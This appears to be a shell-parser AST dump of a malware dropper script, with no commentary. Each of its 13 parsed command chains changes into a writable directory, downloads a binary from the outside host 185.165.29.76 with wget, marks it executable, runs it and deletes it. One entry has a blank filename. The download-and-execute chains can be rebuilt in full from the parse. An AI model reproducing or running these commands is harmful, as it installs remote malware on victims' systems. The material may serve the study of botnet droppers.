ListNode(lineno=2, pos=(12, 137), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 98), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 98), word='http://185.165.29.76/jaden'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(98, 99)),
  CommandNode(lineno=2, pos=(100, 114), parts=[
    WordNode(lineno=2, pos=(100, 105), word='chmod'),
    WordNode(lineno=2, pos=(106, 108), word='+x'),
    WordNode(lineno=2, pos=(109, 114), word='jaden'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(114, 115)),
  CommandNode(lineno=2, pos=(116, 123), parts=[
    WordNode(lineno=2, pos=(116, 123), word='./jaden'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(123, 124)),
  CommandNode(lineno=2, pos=(125, 137), parts=[
    WordNode(lineno=2, pos=(125, 127), word='rm'),
    WordNode(lineno=2, pos=(128, 131), word='-rf'),
    WordNode(lineno=2, pos=(132, 137), word='jaden'),
  ]),
])
ListNode(lineno=3, pos=(138, 263), parts=[
  CommandNode(lineno=3, pos=(138, 145), parts=[
    WordNode(lineno=3, pos=(138, 140), word='cd'),
    WordNode(lineno=3, pos=(141, 145), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(146, 148)),
  CommandNode(lineno=3, pos=(149, 160), parts=[
    WordNode(lineno=3, pos=(149, 151), word='cd'),
    WordNode(lineno=3, pos=(152, 160), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(161, 163)),
  CommandNode(lineno=3, pos=(164, 171), parts=[
    WordNode(lineno=3, pos=(164, 166), word='cd'),
    WordNode(lineno=3, pos=(167, 171), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(172, 174)),
  CommandNode(lineno=3, pos=(175, 183), parts=[
    WordNode(lineno=3, pos=(175, 177), word='cd'),
    WordNode(lineno=3, pos=(178, 183), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(184, 186)),
  CommandNode(lineno=3, pos=(187, 191), parts=[
    WordNode(lineno=3, pos=(187, 189), word='cd'),
    WordNode(lineno=3, pos=(190, 191), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(191, 192)),
  CommandNode(lineno=3, pos=(193, 224), parts=[
    WordNode(lineno=3, pos=(193, 197), word='wget'),
    WordNode(lineno=3, pos=(198, 224), word='http://185.165.29.76/elena'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(224, 225)),
  CommandNode(lineno=3, pos=(226, 240), parts=[
    WordNode(lineno=3, pos=(226, 231), word='chmod'),
    WordNode(lineno=3, pos=(232, 234), word='+x'),
    WordNode(lineno=3, pos=(235, 240), word='elena'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(240, 241)),
  CommandNode(lineno=3, pos=(242, 249), parts=[
    WordNode(lineno=3, pos=(242, 249), word='./elena'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(249, 250)),
  CommandNode(lineno=3, pos=(251, 263), parts=[
    WordNode(lineno=3, pos=(251, 253), word='rm'),
    WordNode(lineno=3, pos=(254, 257), word='-rf'),
    WordNode(lineno=3, pos=(258, 263), word='elena'),
  ]),
])
ListNode(lineno=4, pos=(264, 385), parts=[
  CommandNode(lineno=4, pos=(264, 271), parts=[
    WordNode(lineno=4, pos=(264, 266), word='cd'),
    WordNode(lineno=4, pos=(267, 271), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(272, 274)),
  CommandNode(lineno=4, pos=(275, 286), parts=[
    WordNode(lineno=4, pos=(275, 277), word='cd'),
    WordNode(lineno=4, pos=(278, 286), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(287, 289)),
  CommandNode(lineno=4, pos=(290, 297), parts=[
    WordNode(lineno=4, pos=(290, 292), word='cd'),
    WordNode(lineno=4, pos=(293, 297), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(298, 300)),
  CommandNode(lineno=4, pos=(301, 309), parts=[
    WordNode(lineno=4, pos=(301, 303), word='cd'),
    WordNode(lineno=4, pos=(304, 309), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(310, 312)),
  CommandNode(lineno=4, pos=(313, 317), parts=[
    WordNode(lineno=4, pos=(313, 315), word='cd'),
    WordNode(lineno=4, pos=(316, 317), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(317, 318)),
  CommandNode(lineno=4, pos=(319, 349), parts=[
    WordNode(lineno=4, pos=(319, 323), word='wget'),
    WordNode(lineno=4, pos=(324, 349), word='http://185.165.29.76/vape'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(349, 350)),
  CommandNode(lineno=4, pos=(351, 364), parts=[
    WordNode(lineno=4, pos=(351, 356), word='chmod'),
    WordNode(lineno=4, pos=(357, 359), word='+x'),
    WordNode(lineno=4, pos=(360, 364), word='vape'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(364, 365)),
  CommandNode(lineno=4, pos=(366, 372), parts=[
    WordNode(lineno=4, pos=(366, 372), word='./vape'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(372, 373)),
  CommandNode(lineno=4, pos=(374, 385), parts=[
    WordNode(lineno=4, pos=(374, 376), word='rm'),
    WordNode(lineno=4, pos=(377, 380), word='-rf'),
    WordNode(lineno=4, pos=(381, 385), word='vape'),
  ]),
])
ListNode(lineno=5, pos=(386, 511), parts=[
  CommandNode(lineno=5, pos=(386, 393), parts=[
    WordNode(lineno=5, pos=(386, 388), word='cd'),
    WordNode(lineno=5, pos=(389, 393), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(394, 396)),
  CommandNode(lineno=5, pos=(397, 408), parts=[
    WordNode(lineno=5, pos=(397, 399), word='cd'),
    WordNode(lineno=5, pos=(400, 408), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(409, 411)),
  CommandNode(lineno=5, pos=(412, 419), parts=[
    WordNode(lineno=5, pos=(412, 414), word='cd'),
    WordNode(lineno=5, pos=(415, 419), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(420, 422)),
  CommandNode(lineno=5, pos=(423, 431), parts=[
    WordNode(lineno=5, pos=(423, 425), word='cd'),
    WordNode(lineno=5, pos=(426, 431), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(432, 434)),
  CommandNode(lineno=5, pos=(435, 439), parts=[
    WordNode(lineno=5, pos=(435, 437), word='cd'),
    WordNode(lineno=5, pos=(438, 439), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(439, 440)),
  CommandNode(lineno=5, pos=(441, 472), parts=[
    WordNode(lineno=5, pos=(441, 445), word='wget'),
    WordNode(lineno=5, pos=(446, 472), word='http://185.165.29.76/frank'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(472, 473)),
  CommandNode(lineno=5, pos=(474, 488), parts=[
    WordNode(lineno=5, pos=(474, 479), word='chmod'),
    WordNode(lineno=5, pos=(480, 482), word='+x'),
    WordNode(lineno=5, pos=(483, 488), word='frank'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(488, 489)),
  CommandNode(lineno=5, pos=(490, 497), parts=[
    WordNode(lineno=5, pos=(490, 497), word='./frank'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(497, 498)),
  CommandNode(lineno=5, pos=(499, 511), parts=[
    WordNode(lineno=5, pos=(499, 501), word='rm'),
    WordNode(lineno=5, pos=(502, 505), word='-rf'),
    WordNode(lineno=5, pos=(506, 511), word='frank'),
  ]),
])
ListNode(lineno=6, pos=(512, 633), parts=[
  CommandNode(lineno=6, pos=(512, 519), parts=[
    WordNode(lineno=6, pos=(512, 514), word='cd'),
    WordNode(lineno=6, pos=(515, 519), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(520, 522)),
  CommandNode(lineno=6, pos=(523, 534), parts=[
    WordNode(lineno=6, pos=(523, 525), word='cd'),
    WordNode(lineno=6, pos=(526, 534), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(535, 537)),
  CommandNode(lineno=6, pos=(538, 545), parts=[
    WordNode(lineno=6, pos=(538, 540), word='cd'),
    WordNode(lineno=6, pos=(541, 545), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(546, 548)),
  CommandNode(lineno=6, pos=(549, 557), parts=[
    WordNode(lineno=6, pos=(549, 551), word='cd'),
    WordNode(lineno=6, pos=(552, 557), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(558, 560)),
  CommandNode(lineno=6, pos=(561, 565), parts=[
    WordNode(lineno=6, pos=(561, 563), word='cd'),
    WordNode(lineno=6, pos=(564, 565), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(565, 566)),
  CommandNode(lineno=6, pos=(567, 597), parts=[
    WordNode(lineno=6, pos=(567, 571), word='wget'),
    WordNode(lineno=6, pos=(572, 597), word='http://185.165.29.76/greg'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(597, 598)),
  CommandNode(lineno=6, pos=(599, 612), parts=[
    WordNode(lineno=6, pos=(599, 604), word='chmod'),
    WordNode(lineno=6, pos=(605, 607), word='+x'),
    WordNode(lineno=6, pos=(608, 612), word='greg'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(612, 613)),
  CommandNode(lineno=6, pos=(614, 620), parts=[
    WordNode(lineno=6, pos=(614, 620), word='./greg'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(620, 621)),
  CommandNode(lineno=6, pos=(622, 633), parts=[
    WordNode(lineno=6, pos=(622, 624), word='rm'),
    WordNode(lineno=6, pos=(625, 628), word='-rf'),
    WordNode(lineno=6, pos=(629, 633), word='greg'),
  ]),
])
ListNode(lineno=7, pos=(634, 759), parts=[
  CommandNode(lineno=7, pos=(634, 641), parts=[
    WordNode(lineno=7, pos=(634, 636), word='cd'),
    WordNode(lineno=7, pos=(637, 641), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(642, 644)),
  CommandNode(lineno=7, pos=(645, 656), parts=[
    WordNode(lineno=7, pos=(645, 647), word='cd'),
    WordNode(lineno=7, pos=(648, 656), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(657, 659)),
  CommandNode(lineno=7, pos=(660, 667), parts=[
    WordNode(lineno=7, pos=(660, 662), word='cd'),
    WordNode(lineno=7, pos=(663, 667), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(668, 670)),
  CommandNode(lineno=7, pos=(671, 679), parts=[
    WordNode(lineno=7, pos=(671, 673), word='cd'),
    WordNode(lineno=7, pos=(674, 679), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(680, 682)),
  CommandNode(lineno=7, pos=(683, 687), parts=[
    WordNode(lineno=7, pos=(683, 685), word='cd'),
    WordNode(lineno=7, pos=(686, 687), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(687, 688)),
  CommandNode(lineno=7, pos=(689, 720), parts=[
    WordNode(lineno=7, pos=(689, 693), word='wget'),
    WordNode(lineno=7, pos=(694, 720), word='http://185.165.29.76/loser'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(720, 721)),
  CommandNode(lineno=7, pos=(722, 736), parts=[
    WordNode(lineno=7, pos=(722, 727), word='chmod'),
    WordNode(lineno=7, pos=(728, 730), word='+x'),
    WordNode(lineno=7, pos=(731, 736), word='loser'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(736, 737)),
  CommandNode(lineno=7, pos=(738, 745), parts=[
    WordNode(lineno=7, pos=(738, 745), word='./loser'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(745, 746)),
  CommandNode(lineno=7, pos=(747, 759), parts=[
    WordNode(lineno=7, pos=(747, 749), word='rm'),
    WordNode(lineno=7, pos=(750, 753), word='-rf'),
    WordNode(lineno=7, pos=(754, 759), word='loser'),
  ]),
])
ListNode(lineno=8, pos=(760, 881), parts=[
  CommandNode(lineno=8, pos=(760, 767), parts=[
    WordNode(lineno=8, pos=(760, 762), word='cd'),
    WordNode(lineno=8, pos=(763, 767), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(768, 770)),
  CommandNode(lineno=8, pos=(771, 782), parts=[
    WordNode(lineno=8, pos=(771, 773), word='cd'),
    WordNode(lineno=8, pos=(774, 782), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(783, 785)),
  CommandNode(lineno=8, pos=(786, 793), parts=[
    WordNode(lineno=8, pos=(786, 788), word='cd'),
    WordNode(lineno=8, pos=(789, 793), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(794, 796)),
  CommandNode(lineno=8, pos=(797, 805), parts=[
    WordNode(lineno=8, pos=(797, 799), word='cd'),
    WordNode(lineno=8, pos=(800, 805), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(806, 808)),
  CommandNode(lineno=8, pos=(809, 813), parts=[
    WordNode(lineno=8, pos=(809, 811), word='cd'),
    WordNode(lineno=8, pos=(812, 813), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(813, 814)),
  CommandNode(lineno=8, pos=(815, 845), parts=[
    WordNode(lineno=8, pos=(815, 819), word='wget'),
    WordNode(lineno=8, pos=(820, 845), word='http://185.165.29.76/dave'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(845, 846)),
  CommandNode(lineno=8, pos=(847, 860), parts=[
    WordNode(lineno=8, pos=(847, 852), word='chmod'),
    WordNode(lineno=8, pos=(853, 855), word='+x'),
    WordNode(lineno=8, pos=(856, 860), word='dave'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(860, 861)),
  CommandNode(lineno=8, pos=(862, 868), parts=[
    WordNode(lineno=8, pos=(862, 868), word='./dave'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(868, 869)),
  CommandNode(lineno=8, pos=(870, 881), parts=[
    WordNode(lineno=8, pos=(870, 872), word='rm'),
    WordNode(lineno=8, pos=(873, 876), word='-rf'),
    WordNode(lineno=8, pos=(877, 881), word='dave'),
  ]),
])
ListNode(lineno=9, pos=(882, 1003), parts=[
  CommandNode(lineno=9, pos=(882, 889), parts=[
    WordNode(lineno=9, pos=(882, 884), word='cd'),
    WordNode(lineno=9, pos=(885, 889), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(890, 892)),
  CommandNode(lineno=9, pos=(893, 904), parts=[
    WordNode(lineno=9, pos=(893, 895), word='cd'),
    WordNode(lineno=9, pos=(896, 904), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(905, 907)),
  CommandNode(lineno=9, pos=(908, 915), parts=[
    WordNode(lineno=9, pos=(908, 910), word='cd'),
    WordNode(lineno=9, pos=(911, 915), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(916, 918)),
  CommandNode(lineno=9, pos=(919, 927), parts=[
    WordNode(lineno=9, pos=(919, 921), word='cd'),
    WordNode(lineno=9, pos=(922, 927), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(928, 930)),
  CommandNode(lineno=9, pos=(931, 935), parts=[
    WordNode(lineno=9, pos=(931, 933), word='cd'),
    WordNode(lineno=9, pos=(934, 935), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(935, 936)),
  CommandNode(lineno=9, pos=(937, 967), parts=[
    WordNode(lineno=9, pos=(937, 941), word='wget'),
    WordNode(lineno=9, pos=(942, 967), word='http://185.165.29.76/mike'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(967, 968)),
  CommandNode(lineno=9, pos=(969, 982), parts=[
    WordNode(lineno=9, pos=(969, 974), word='chmod'),
    WordNode(lineno=9, pos=(975, 977), word='+x'),
    WordNode(lineno=9, pos=(978, 982), word='mike'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(982, 983)),
  CommandNode(lineno=9, pos=(984, 990), parts=[
    WordNode(lineno=9, pos=(984, 990), word='./mike'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(990, 991)),
  CommandNode(lineno=9, pos=(992, 1003), parts=[
    WordNode(lineno=9, pos=(992, 994), word='rm'),
    WordNode(lineno=9, pos=(995, 998), word='-rf'),
    WordNode(lineno=9, pos=(999, 1003), word='mike'),
  ]),
])
ListNode(lineno=10, pos=(1004, 1133), parts=[
  CommandNode(lineno=10, pos=(1004, 1011), parts=[
    WordNode(lineno=10, pos=(1004, 1006), word='cd'),
    WordNode(lineno=10, pos=(1007, 1011), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1012, 1014)),
  CommandNode(lineno=10, pos=(1015, 1026), parts=[
    WordNode(lineno=10, pos=(1015, 1017), word='cd'),
    WordNode(lineno=10, pos=(1018, 1026), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1027, 1029)),
  CommandNode(lineno=10, pos=(1030, 1037), parts=[
    WordNode(lineno=10, pos=(1030, 1032), word='cd'),
    WordNode(lineno=10, pos=(1033, 1037), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1038, 1040)),
  CommandNode(lineno=10, pos=(1041, 1049), parts=[
    WordNode(lineno=10, pos=(1041, 1043), word='cd'),
    WordNode(lineno=10, pos=(1044, 1049), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1050, 1052)),
  CommandNode(lineno=10, pos=(1053, 1057), parts=[
    WordNode(lineno=10, pos=(1053, 1055), word='cd'),
    WordNode(lineno=10, pos=(1056, 1057), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1057, 1058)),
  CommandNode(lineno=10, pos=(1059, 1091), parts=[
    WordNode(lineno=10, pos=(1059, 1063), word='wget'),
    WordNode(lineno=10, pos=(1064, 1091), word='http://185.165.29.76/renard'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1091, 1092)),
  CommandNode(lineno=10, pos=(1093, 1108), parts=[
    WordNode(lineno=10, pos=(1093, 1098), word='chmod'),
    WordNode(lineno=10, pos=(1099, 1101), word='+x'),
    WordNode(lineno=10, pos=(1102, 1108), word='renard'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1108, 1109)),
  CommandNode(lineno=10, pos=(1110, 1118), parts=[
    WordNode(lineno=10, pos=(1110, 1118), word='./renard'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1118, 1119)),
  CommandNode(lineno=10, pos=(1120, 1133), parts=[
    WordNode(lineno=10, pos=(1120, 1122), word='rm'),
    WordNode(lineno=10, pos=(1123, 1126), word='-rf'),
    WordNode(lineno=10, pos=(1127, 1133), word='renard'),
  ]),
])
ListNode(lineno=11, pos=(1134, 1255), parts=[
  CommandNode(lineno=11, pos=(1134, 1141), parts=[
    WordNode(lineno=11, pos=(1134, 1136), word='cd'),
    WordNode(lineno=11, pos=(1137, 1141), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1142, 1144)),
  CommandNode(lineno=11, pos=(1145, 1156), parts=[
    WordNode(lineno=11, pos=(1145, 1147), word='cd'),
    WordNode(lineno=11, pos=(1148, 1156), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1157, 1159)),
  CommandNode(lineno=11, pos=(1160, 1167), parts=[
    WordNode(lineno=11, pos=(1160, 1162), word='cd'),
    WordNode(lineno=11, pos=(1163, 1167), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1168, 1170)),
  CommandNode(lineno=11, pos=(1171, 1179), parts=[
    WordNode(lineno=11, pos=(1171, 1173), word='cd'),
    WordNode(lineno=11, pos=(1174, 1179), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1180, 1182)),
  CommandNode(lineno=11, pos=(1183, 1187), parts=[
    WordNode(lineno=11, pos=(1183, 1185), word='cd'),
    WordNode(lineno=11, pos=(1186, 1187), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1187, 1188)),
  CommandNode(lineno=11, pos=(1189, 1219), parts=[
    WordNode(lineno=11, pos=(1189, 1193), word='wget'),
    WordNode(lineno=11, pos=(1194, 1219), word='http://185.165.29.76/kali'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1219, 1220)),
  CommandNode(lineno=11, pos=(1221, 1234), parts=[
    WordNode(lineno=11, pos=(1221, 1226), word='chmod'),
    WordNode(lineno=11, pos=(1227, 1229), word='+x'),
    WordNode(lineno=11, pos=(1230, 1234), word='kali'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1234, 1235)),
  CommandNode(lineno=11, pos=(1236, 1242), parts=[
    WordNode(lineno=11, pos=(1236, 1242), word='./kali'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1242, 1243)),
  CommandNode(lineno=11, pos=(1244, 1255), parts=[
    WordNode(lineno=11, pos=(1244, 1246), word='rm'),
    WordNode(lineno=11, pos=(1247, 1250), word='-rf'),
    WordNode(lineno=11, pos=(1251, 1255), word='kali'),
  ]),
])
ListNode(lineno=12, pos=(1256, 1373), parts=[
  CommandNode(lineno=12, pos=(1256, 1263), parts=[
    WordNode(lineno=12, pos=(1256, 1258), word='cd'),
    WordNode(lineno=12, pos=(1259, 1263), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1264, 1266)),
  CommandNode(lineno=12, pos=(1267, 1278), parts=[
    WordNode(lineno=12, pos=(1267, 1269), word='cd'),
    WordNode(lineno=12, pos=(1270, 1278), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1279, 1281)),
  CommandNode(lineno=12, pos=(1282, 1289), parts=[
    WordNode(lineno=12, pos=(1282, 1284), word='cd'),
    WordNode(lineno=12, pos=(1285, 1289), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1290, 1292)),
  CommandNode(lineno=12, pos=(1293, 1301), parts=[
    WordNode(lineno=12, pos=(1293, 1295), word='cd'),
    WordNode(lineno=12, pos=(1296, 1301), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1302, 1304)),
  CommandNode(lineno=12, pos=(1305, 1309), parts=[
    WordNode(lineno=12, pos=(1305, 1307), word='cd'),
    WordNode(lineno=12, pos=(1308, 1309), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1309, 1310)),
  CommandNode(lineno=12, pos=(1311, 1340), parts=[
    WordNode(lineno=12, pos=(1311, 1315), word='wget'),
    WordNode(lineno=12, pos=(1316, 1340), word='http://185.165.29.76/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1340, 1341)),
  CommandNode(lineno=12, pos=(1342, 1354), parts=[
    WordNode(lineno=12, pos=(1342, 1347), word='chmod'),
    WordNode(lineno=12, pos=(1348, 1350), word='+x'),
    WordNode(lineno=12, pos=(1351, 1354), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1354, 1355)),
  CommandNode(lineno=12, pos=(1356, 1361), parts=[
    WordNode(lineno=12, pos=(1356, 1361), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1361, 1362)),
  CommandNode(lineno=12, pos=(1363, 1373), parts=[
    WordNode(lineno=12, pos=(1363, 1365), word='rm'),
    WordNode(lineno=12, pos=(1366, 1369), word='-rf'),
    WordNode(lineno=12, pos=(1370, 1373), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1374, 1499), parts=[
  CommandNode(lineno=13, pos=(1374, 1381), parts=[
    WordNode(lineno=13, pos=(1374, 1376), word='cd'),
    WordNode(lineno=13, pos=(1377, 1381), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1382, 1384)),
  CommandNode(lineno=13, pos=(1385, 1396), parts=[
    WordNode(lineno=13, pos=(1385, 1387), word='cd'),
    WordNode(lineno=13, pos=(1388, 1396), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1397, 1399)),
  CommandNode(lineno=13, pos=(1400, 1407), parts=[
    WordNode(lineno=13, pos=(1400, 1402), word='cd'),
    WordNode(lineno=13, pos=(1403, 1407), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1408, 1410)),
  CommandNode(lineno=13, pos=(1411, 1419), parts=[
    WordNode(lineno=13, pos=(1411, 1413), word='cd'),
    WordNode(lineno=13, pos=(1414, 1419), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1420, 1422)),
  CommandNode(lineno=13, pos=(1423, 1427), parts=[
    WordNode(lineno=13, pos=(1423, 1425), word='cd'),
    WordNode(lineno=13, pos=(1426, 1427), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1427, 1428)),
  CommandNode(lineno=13, pos=(1429, 1460), parts=[
    WordNode(lineno=13, pos=(1429, 1433), word='wget'),
    WordNode(lineno=13, pos=(1434, 1460), word='http://185.165.29.76/drake'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1460, 1461)),
  CommandNode(lineno=13, pos=(1462, 1476), parts=[
    WordNode(lineno=13, pos=(1462, 1467), word='chmod'),
    WordNode(lineno=13, pos=(1468, 1470), word='+x'),
    WordNode(lineno=13, pos=(1471, 1476), word='drake'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1476, 1477)),
  CommandNode(lineno=13, pos=(1478, 1485), parts=[
    WordNode(lineno=13, pos=(1478, 1485), word='./drake'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1485, 1486)),
  CommandNode(lineno=13, pos=(1487, 1499), parts=[
    WordNode(lineno=13, pos=(1487, 1489), word='rm'),
    WordNode(lineno=13, pos=(1490, 1493), word='-rf'),
    WordNode(lineno=13, pos=(1494, 1499), word='drake'),
  ]),
])
ListNode(lineno=14, pos=(1500, 1625), parts=[
  CommandNode(lineno=14, pos=(1500, 1507), parts=[
    WordNode(lineno=14, pos=(1500, 1502), word='cd'),
    WordNode(lineno=14, pos=(1503, 1507), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1508, 1510)),
  CommandNode(lineno=14, pos=(1511, 1522), parts=[
    WordNode(lineno=14, pos=(1511, 1513), word='cd'),
    WordNode(lineno=14, pos=(1514, 1522), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1523, 1525)),
  CommandNode(lineno=14, pos=(1526, 1533), parts=[
    WordNode(lineno=14, pos=(1526, 1528), word='cd'),
    WordNode(lineno=14, pos=(1529, 1533), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1534, 1536)),
  CommandNode(lineno=14, pos=(1537, 1545), parts=[
    WordNode(lineno=14, pos=(1537, 1539), word='cd'),
    WordNode(lineno=14, pos=(1540, 1545), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1546, 1548)),
  CommandNode(lineno=14, pos=(1549, 1553), parts=[
    WordNode(lineno=14, pos=(1549, 1551), word='cd'),
    WordNode(lineno=14, pos=(1552, 1553), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1553, 1554)),
  CommandNode(lineno=14, pos=(1555, 1586), parts=[
    WordNode(lineno=14, pos=(1555, 1559), word='wget'),
    WordNode(lineno=14, pos=(1560, 1586), word='http://185.165.29.76/lance'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1586, 1587)),
  CommandNode(lineno=14, pos=(1588, 1602), parts=[
    WordNode(lineno=14, pos=(1588, 1593), word='chmod'),
    WordNode(lineno=14, pos=(1594, 1596), word='+x'),
    WordNode(lineno=14, pos=(1597, 1602), word='lance'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1602, 1603)),
  CommandNode(lineno=14, pos=(1604, 1611), parts=[
    WordNode(lineno=14, pos=(1604, 1611), word='./lance'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1611, 1612)),
  CommandNode(lineno=14, pos=(1613, 1625), parts=[
    WordNode(lineno=14, pos=(1613, 1615), word='rm'),
    WordNode(lineno=14, pos=(1616, 1619), word='-rf'),
    WordNode(lineno=14, pos=(1620, 1625), word='lance'),
  ]),
])
